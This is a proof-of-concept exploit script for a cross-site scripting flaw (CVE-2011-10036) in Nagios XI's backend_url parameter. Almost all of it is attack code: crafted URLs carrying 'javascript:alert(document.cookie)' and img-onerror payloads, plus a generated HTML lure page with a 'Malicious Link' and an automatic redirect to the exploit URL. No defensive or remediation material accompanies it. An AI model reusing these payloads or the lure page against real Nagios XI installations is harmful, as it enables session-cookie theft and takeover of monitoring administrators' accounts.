CVE-2011-10036: Nagios XI backend_url XSS跨站脚本漏洞

// CVE-2011-10036 PoC - Nagios XI XSS via backend_url // Target: Nagios XI < 2011R1.9 // Attack Vector: Inject JavaScript via backend_url parameter // Malicious URL construction const maliciousUrl = 'http://target-nagios-xi/nagiosxi/backend/'; const payload = 'backend_url=javascript:alert(document.cookie)'; // Alternative payload with img tag const imgPayload = 'backend_url=<img src=x onerror=alert(document.domain)>'; // Full PoC URL const pocUrl = `${maliciousUrl}?${payload}`; console.log('CVE-2011-10036 PoC URL:'); console.log(pocUrl); // HTML PoC page const htmlPoC = ` <!DOCTYPE html> <html> <head><title>CVE-2011-10036 PoC</title></head> <body> <h1>Nagios XI XSS via backend_url</h1> <p>Click the link below to trigger XSS:</p> <a href="${pocUrl}">Malicious Link</a> <script> // Auto-submit or redirect to trigger the vulnerability if (location.hash === '#auto') { window.location.href = '${pocUrl}'; } </script> </body> </html> `; console.log('\nHTML PoC:'); console.log(htmlPoC);